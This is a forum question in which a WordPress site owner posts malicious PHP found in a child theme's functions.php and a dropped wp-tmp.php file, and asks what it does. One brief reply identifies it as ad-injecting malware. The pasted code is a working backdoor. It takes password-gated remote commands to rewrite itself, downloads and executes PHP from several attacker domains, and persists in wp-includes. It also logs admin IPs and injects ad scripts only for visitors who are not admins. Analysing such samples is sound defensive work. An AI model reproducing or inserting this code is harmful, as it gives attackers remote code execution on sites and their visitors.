1

I found the following code in a child theme's functions.php
Even if you delete it it re-generates automatically

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '39790f7c9b39216528df57a9c6c72032')) {
    $div_code_name = "wp_vcd";
    switch ($_REQUEST['action']) {
        case 'change_domain';
            if (isset($_REQUEST['newdomain'])) {
                if (!empty($_REQUEST['newdomain'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain)) {
                            $file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        case 'change_code';
            if (isset($_REQUEST['newcode'])) {
                if (!empty($_REQUEST['newcode'])) {
                    if ($file = @file_get_contents(__FILE__)) {
                        if (preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode)) {
                            $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                            @file_put_contents(__FILE__, $file);
                            print "true";
                        }
                    }
                }
            }
            break;
        default:
            print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}
$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if (!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            if (fwrite($handle, "<?php\n" . $phpCode)) {
            } else {
                $tmpfname = tempnam('./', "theme_temp_setup");
                $handle   = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
            }
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        $wp_auth_key = '0bb00640fa54049fc4c2c5e080f9f51a';
        if (($tmpcontent = @file_get_contents("http://www.facocs.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.facocs.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.facocs.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents("http://www.facocs.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false) {
            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
        }
    }
}

I don't understand exactly what it does yet. It seems to download php code from some website and puts it in wp-includes/wp-tmp.php

Here's the content of wp-includes/wp-tmp.php :

ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key = '0bb00640fa54049fc4c2c5e080f95f1a';
$file        = file_get_contents(get_template_directory() . '/functions.php');
$filec       = file_get_contents(get_stylesheet_directory() . '/functions.php');
$rep         = "dacocs.top";
$repw        = "dacocs.xyz";
if (stripos($file, $rep) !== false) {
    $new_file = str_replace($rep, $repw, $file);
    @file_put_contents(get_template_directory() . '/functions.php', $new_file);
}
if (stripos($filec, $rep) !== false) {
    $new_filec = str_replace($rep, $repw, $filec);
    @file_put_contents(get_stylesheet_directory() . '/functions.php', $new_filec);
}
if (!function_exists('slider_option')) {
    function slider_option($content)
    {
        if (is_single()) {
            $con     = '
';
            $con2    = '

<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1610264"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1610267&interactive=1&pushup=1"></script>

';
            $content = $content . $con2;
        }
        return $content;
    }
    function slider_option_footer()
    {
        if (!is_single()) {
            $con2 = '

<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1610264"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1610267&interactive=1&pushup=1"></script>

';
            echo $con2;
        }
    }
    function setting_my_first_cookie()
    {
        setcookie('wordpress_cf_adm_use_adm', 1, time() + 3600 * 24 * 1000, COOKIEPATH, COOKIE_DOMAIN);
    }
    if (is_user_logged_in()) {
        add_action('init', 'setting_my_first_cookie', 1);
    }
    if (current_user_can('edit_others_pages')) {
        if (file_exists(ABSPATH . 'wp-includes/wp-feed.php')) {
            $ip = @file_get_contents(ABSPATH . 'wp-includes/wp-feed.php');
        }
        if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false) {
            $ip .= $_SERVER['REMOTE_ADDR'] . '
';
            @file_put_contents(ABSPATH . 'wp-includes/wp-feed.php', $ip);
        }
    }
    $ref = $_SERVER['HTTP_REFERER'];
    $SE  = array(
        'google.',
        '/search?',
        'images.google.',
        'web.info.com',
        'search.',
        'yahoo.',
        'yandex',
        'msn.',
        'baidu',
        'bing.',
        'doubleclick.net',
        'googleweblight.com'
    );
    foreach ($SE as $source) {
        if (strpos($ref, $source) !== false) {
            setcookie("sevisitor", 1, time() + 120, COOKIEPATH, COOKIE_DOMAIN);
            $sevisitor = true;
        }
    }
    if (!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) {
        $adtxt = @file_get_contents(ABSPATH . 'wp-includes/wp-feed.php');
        if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false) {
            if ($sevisitor == true || isset($_COOKIE['sevisitor'])) {
                add_filter('the_content', 'slider_option');
                add_action('wp_footer', 'slider_option_footer');
            }
        }
    }
}

Has anybody encountered something like this before ?

Mehdiway
  • 119
  • 2
  • Looks like it injects ads and it makes sure it's not displayed when a search engine bot visits the site. It has a few fallback domains to get the code from and has a function to update text in itself (such as any of the domain names) to something else in case the domain name is taken down. Very common in WordPress themes downloaded from random sites or that have a low amount of downloads on the official WordPress site. – Technidev Apr 05 '18 at 02:10
  • 1
    Hi, what is your question? – multithr3at3d Apr 05 '18 at 02:32

0 Answers0